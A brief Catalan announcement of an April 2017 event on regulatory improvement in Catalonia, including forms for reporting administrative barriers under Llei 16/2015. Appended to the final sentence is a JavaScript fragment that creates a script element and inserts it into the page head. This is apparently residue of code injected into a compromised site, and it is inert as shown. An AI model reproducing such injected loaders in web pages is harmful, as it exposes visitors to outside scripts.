La política de millora de la Regulació a Catalunya

31/03/2017

Jornada el 6 d’abril per difondre les iniciatives que ha promogut la Generalitat de Catalunya en l’àmbit de la millora de la regulació. Per fomentar un rol participatiu dels assistents es facilitaran formularis del mecanisme previst a l’article 10 de la Llei 16/2015, de simplificació administrativa, per tal que els empresaris i interessats puguin posar en coneixement de l’administració consultes i reclamacions en relació a les traves administratives i barreres a l’activitat econòmica. Més informació en aquest enllaç.var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);